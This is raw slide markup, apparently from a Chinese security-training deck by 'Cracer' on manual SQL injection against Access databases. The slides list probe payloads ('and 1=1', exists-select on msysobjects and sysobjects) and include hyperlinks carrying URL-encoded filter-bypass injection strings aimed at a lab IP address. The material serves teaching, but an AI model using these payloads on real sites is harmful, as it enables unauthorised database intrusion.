    <dgm:cxn modelId="{ABD6FDEB-E267-45A9-B5A6-BB7AB702D791}" srcId="{1357AF48-B375-4E19-BEE6-B52B3406EB4C}" destId="{6B4CBB64-BEE1-4D9C-AEC1-1AD966F6C241}" srcOrd="0" destOrd="0" parTransId="{0D8272C2-A9B1-4844-AD4A-C6482297A513}" sibTransId="{D6E50E41-86B5-49E9-BC61-8848C5B5ED9B}"/>
    <dgm:cxn modelId="{B617926B-AEA2-49CB-9DA4-E43C0D6EB6AA}" type="presParOf" srcId="{127604A9-334B-43D6-A57B-9671B4D27DAF}" destId="{B479DB21-968E-46CA-9CB2-7B8B8C59B263}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{12EF2988-C818-48DB-9108-CE48373AE97B}" type="presParOf" srcId="{B479DB21-968E-46CA-9CB2-7B8B8C59B263}" destId="{EA166B51-C510-409A-9807-2AC1B4603369}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{BCB1266F-DD67-4708-9C9D-3E5CF1AD898E}" type="presParOf" srcId="{EA166B51-C510-409A-9807-2AC1B4603369}" destId="{FCEA6F22-210E-4A16-93A9-18AD2E33FFA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{59D651A7-97DD-4C77-991C-99E5A06D27EC}" type="presParOf" srcId="{EA166B51-C510-409A-9807-2AC1B4603369}" destId="{EC16E5EC-D7A3-4442-9478-7C44B919DE6E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{D686E0A3-6655-41B7-B765-A37DB6CE21F5}" type="presParOf" srcId="{EA166B51-C510-409A-9807-2AC1B4603369}" destId="{D74768B5-75A3-4E35-B75D-4F930A77876E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{B73BE280-A2F3-4764-AD8E-5D5AFF4E3991}" type="presParOf" srcId="{B479DB21-968E-46CA-9CB2-7B8B8C59B263}" destId="{16DB555A-D10D-4024-8286-3F485232F489}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{CBD884ED-4717-45CA-97E7-5BC8CC87F827}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{766471AB-F440-439C-9A82-03B257E4F840}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{5C3D21D7-9A84-43A6-8D34-85901EDAC51C}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{CB43F356-4603-41A5-B54C-BC16FABAF7AE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{DA68A21E-4905-4C67-A202-502D41E1946F}" type="presParOf" srcId="{CB43F356-4603-41A5-B54C-BC16FABAF7AE}" destId="{B3802E74-65DA-491D-8F2A-F6994A9CFE08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{29A7F682-77B9-40CE-9796-E36B0DF30A94}" type="presParOf" srcId="{B3802E74-65DA-491D-8F2A-F6994A9CFE08}" destId="{D4B7A93B-5415-4FE5-A936-F56076B56D42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{DEF91B86-8543-4D2A-B028-E6E3EE1B56D3}" type="presParOf" srcId="{B3802E74-65DA-491D-8F2A-F6994A9CFE08}" destId="{A6EC7C47-EB71-49C6-A64E-39BC503EA244}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{E1C92713-53E8-4AA9-87D3-746DFD1F6542}" type="presParOf" srcId="{B3802E74-65DA-491D-8F2A-F6994A9CFE08}" destId="{09646F8D-D50C-4795-BC17-F35C6C2928EE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{4F843388-631B-4DF1-9C69-334B511C35CF}" type="presParOf" srcId="{CB43F356-4603-41A5-B54C-BC16FABAF7AE}" destId="{7784C8F1-FB08-4B94-835C-0AFAAACF1F1E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{1F30BC74-6F3B-423F-A368-A55685578EB7}" type="presParOf" srcId="{CB43F356-4603-41A5-B54C-BC16FABAF7AE}" destId="{BAC1B5F9-4681-464A-ADC0-C7FD92FF9A36}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{015432E2-FA14-4433-AD33-811DFC0C34FC}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{4C9DD160-5EBB-4112-9CBC-EF44B8EFB87D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{0CF8B712-87EB-4FFF-A6BF-025DE5D94982}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{434410F1-11F0-49D1-9E42-C4863FA94A15}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{B6935902-7ADC-4FF6-B3DC-7EAAC2039D87}" type="presParOf" srcId="{434410F1-11F0-49D1-9E42-C4863FA94A15}" destId="{F846C842-6BF3-416A-905C-941E75EA36C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{25DB98D2-995A-44AF-B564-84CC2E474D8B}" type="presParOf" srcId="{F846C842-6BF3-416A-905C-941E75EA36C4}" destId="{68FE00AC-BA23-48A8-82CE-F02F0491E82E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{FF621677-E733-4BB2-B39A-6F924638EF8E}" type="presParOf" srcId="{F846C842-6BF3-416A-905C-941E75EA36C4}" destId="{BF15196E-9BA6-40B6-92E8-2B8EA87373AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{0D9AA201-FEE8-4A2C-A245-42D43624984D}" type="presParOf" srcId="{F846C842-6BF3-416A-905C-941E75EA36C4}" destId="{5F10A4B7-148C-4411-993B-50BAE1A51BBD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{93C9A791-D1F9-46B2-A0E6-0F432B4AC590}" type="presParOf" srcId="{434410F1-11F0-49D1-9E42-C4863FA94A15}" destId="{D44E8DC7-32A8-4454-95CE-BF2E01C46A6B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{8F09AD64-1216-4A8F-B8D1-D41AC0372CF8}" type="presParOf" srcId="{434410F1-11F0-49D1-9E42-C4863FA94A15}" destId="{91FE4B5A-FBF9-47BE-A78F-D88DC844C28F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{FE95269B-C951-477C-9AE1-B135351A95CB}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{3161AFCB-9C8A-44BE-90D4-B7CB8513D62C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{3F52C324-CBDD-48EA-B59F-FCBED4CDA412}" type="presParOf" srcId="{16DB555A-D10D-4024-8286-3F485232F489}" destId="{F7A16201-5CB9-49C6-B091-3F34D600F604}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{564F3DA3-CFB7-4C78-AEC5-B92AC094A969}" type="presParOf" srcId="{F7A16201-5CB9-49C6-B091-3F34D600F604}" destId="{1FBF0C21-7F37-4933-8CE7-52F3BAAEBAE8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{579D3EF6-B1DF-41B4-A6B4-8558B04C3A1B}" type="presParOf" srcId="{1FBF0C21-7F37-4933-8CE7-52F3BAAEBAE8}" destId="{B4A0EB66-CB9E-4CEB-9A10-7E1FAE2122E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{163498DB-54F9-49B8-A971-610909E94F4C}" type="presParOf" srcId="{1FBF0C21-7F37-4933-8CE7-52F3BAAEBAE8}" destId="{E82B1533-688E-4447-8B49-046BD2545259}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{1205A2B7-9B24-4762-BA0F-4EE1AD62EDD5}" type="presParOf" srcId="{1FBF0C21-7F37-4933-8CE7-52F3BAAEBAE8}" destId="{F6BFBEF1-AD0A-4158-86E4-B30181332883}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{783D6742-9DC1-4514-9E75-22E568F786A4}" type="presParOf" srcId="{F7A16201-5CB9-49C6-B091-3F34D600F604}" destId="{C89AF9D9-F06B-44FC-B188-8CD80DD0D440}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{09DAF3F9-4632-4B83-B67C-CF991F92CB43}" type="presParOf" srcId="{F7A16201-5CB9-49C6-B091-3F34D600F604}" destId="{7A993E7E-B1B8-48D6-B325-B65D8A30C5F7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{DD05A193-1B61-4426-B1E7-C97017538EEF}" type="presParOf" srcId="{B479DB21-968E-46CA-9CB2-7B8B8C59B263}" destId="{1A86C67D-DE04-4CDC-832C-5BD2EA39311F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{D2E39E80-4FCC-4A3E-A77F-88B6C06BED8B}" type="presParOf" srcId="{1A86C67D-DE04-4CDC-832C-5BD2EA39311F}" destId="{0E935C0B-00AA-48E6-9062-53308C955031}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{40EF3751-47FB-4878-BDA6-9194760751D1}" type="presParOf" srcId="{1A86C67D-DE04-4CDC-832C-5BD2EA39311F}" destId="{40A0ABD0-8AE5-46B4-95AC-2DE375EE60AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{BF4331CB-C406-45C6-9802-31DBDA064F66}" type="presParOf" srcId="{40A0ABD0-8AE5-46B4-95AC-2DE375EE60AA}" destId="{106CF8B4-7812-4A43-95E0-890992525C0D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{E4844C6A-E2D5-45F7-8E71-CDB0D8372A44}" type="presParOf" srcId="{106CF8B4-7812-4A43-95E0-890992525C0D}" destId="{6B422153-C4A8-41B3-A116-EACB9284FF2F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{99CB6247-04AC-4B1C-8945-6FA543D42F38}" type="presParOf" srcId="{106CF8B4-7812-4A43-95E0-890992525C0D}" destId="{197F8693-2C88-4660-A613-997D7EE27D98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{61063DA6-72BB-4880-AB41-D545755247FE}" type="presParOf" srcId="{106CF8B4-7812-4A43-95E0-890992525C0D}" destId="{DE9E29BC-C997-4557-9F87-0E3E17070AC8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{56D985AB-0EA5-411B-9FA8-7E65549B8C5E}" type="presParOf" srcId="{40A0ABD0-8AE5-46B4-95AC-2DE375EE60AA}" destId="{DFF55701-8138-4974-910A-9CBC303002B4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChart#1"/>
    <dgm:cxn modelId="{02248750-8423-480D-AC6D-27557F4266FF}" type="presParOf" srcId="{40A0ABD0-8AE5-46B4-95AC-2DE375EE60AA}" destId="{1CAB730B-BA06-4285-ADD8-4A59C58567CD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/NameandTitleOrganizationalChar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35C0B-00AA-48E6-9062-53308C955031}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3413766" y="1025749"/>
          <a:ext cx="289008" cy="762691"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="289008" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="289008" y="762691"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="7626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1AFCB-9C8A-44BE-90D4-B7CB8513D62C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3702775" y="1025749"/>
          <a:ext cx="2305399" cy="1689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687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2305399" y="1488687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2305399" y="16892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DD160-5EBB-4112-9CBC-EF44B8EFB87D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3657055" y="1025749"/>
          <a:ext cx="91440" cy="1689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8687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="123364" y="1488687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="123364" y="16892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471AB-F440-439C-9A82-03B257E4F840}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1552665" y="1025749"/>
          <a:ext cx="2150109" cy="1689291"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2150109" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2150109" y="1488687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1488687"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="16892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A6F22-210E-4A16-93A9-18AD2E33FFA2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2471367" y="166017"/>
          <a:ext cx="2462815" cy="859731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131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数据库管理系统</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>数据库</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2471367" y="166017"/>
        <a:ext cx="2462815" cy="859731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC16E5EC-D7A3-4442-9478-7C44B919DE6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5007535" y="437877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数据库服务器</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5007535" y="437877"/>
        <a:ext cx="1494447" cy="286577"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D4B7A93B-5415-4FE5-A936-F56076B56D42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="722416" y="2715040"/>
          <a:ext cx="1660496" cy="859731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213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</a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="722416" y="2715040"/>
        <a:ext cx="1660496" cy="859731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6EC7C47-EB71-49C6-A64E-39BC503EA244}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5999821" y="1488021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5999821" y="1488021"/>
        <a:ext cx="1494447" cy="286577"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68FE00AC-BA23-48A8-82CE-F02F0491E82E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2950171" y="2715040"/>
          <a:ext cx="1660496" cy="859731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213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</a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2950171" y="2715040"/>
        <a:ext cx="1660496" cy="859731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF15196E-9BA6-40B6-92E8-2B8EA87373AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6016840" y="1494535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6016840" y="1494535"/>
        <a:ext cx="1494447" cy="286577"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B4A0EB66-CB9E-4CEB-9A10-7E1FAE2122E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5177926" y="2715040"/>
          <a:ext cx="1660496" cy="859731"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/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213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</a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5177926" y="2715040"/>
        <a:ext cx="1660496" cy="859731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E82B1533-688E-4447-8B49-046BD2545259}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6610006" y="1485912"/>
          <a:ext cx="277892" cy="286577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6610006" y="1485912"/>
        <a:ext cx="277892" cy="286577"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6B422153-C4A8-41B3-A116-EACB9284FF2F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1753269" y="1358575"/>
          <a:ext cx="1660496" cy="859731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213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网站</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1753269" y="1358575"/>
        <a:ext cx="1660496" cy="859731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{197F8693-2C88-4660-A613-997D7EE27D98}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3741649" y="1621814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WEB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1700" kern="1200" dirty="0"/>
            <a:t>服务器</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3741649" y="1621814"/>
        <a:ext cx="1494447" cy="28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#1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714" y="2500439"/>
            <a:ext cx="7142573" cy="100952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4714" y="3602038"/>
            <a:ext cx="7142573" cy="56181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03102"/>
            <a:ext cx="12192000" cy="2548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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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86080" y="544830"/>
            <a:ext cx="5946775" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600"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>
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4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61035" y="1515076"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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>
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE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C58B-1263-4BF1-AC00-D94967AC28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2E82-1B0D-4500-9A39-2FD7D9C8C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192.168.149.130:86/shownews.asp" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.149.130:86/shownews.asp?id=5" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.149.130:86/news.asp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192.168.149.130:84/common.asp?id=16%25%25%25%25%25%25%25%25%25%25%25%25%0aa%25%25n%25%25d%25%25%25%25%25%25%25%25%25%25%25%0a1=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.149.130:84/common.asp?id=16%25%25%25%25%25%25%25%25%25%25%25%25%0aand%25%25%25%25%25%25%25%25%25%25%25%0a1=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.149.130:84/common.asp?id=16++and%25%25%25%25%25%25%25%25%25%25%25%0a1=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2007.mdb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64970" y="1818640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928806" y="495632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solidFill>
                <a:srgbClr val="1BA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17096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln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en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="20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106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill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WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="方正综艺简体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altLang="zh-CN" sz="1800" kern="12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ACCESS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="12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注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="120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2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ACCESS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>手工注入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dirty="0"/>
              <a:t>漏洞出现的位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手工挖掘：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有参数传递</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有数据库交互</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们可以控制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工具扫描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Awvs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>burp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appscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单引号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>And 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>And 1=2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 －</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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判断数据库类型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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and ex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zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sts (select * from msysobjects)&gt;0  access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and ex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zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sts (select * from sysobjects)&gt;0     sqlserver</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
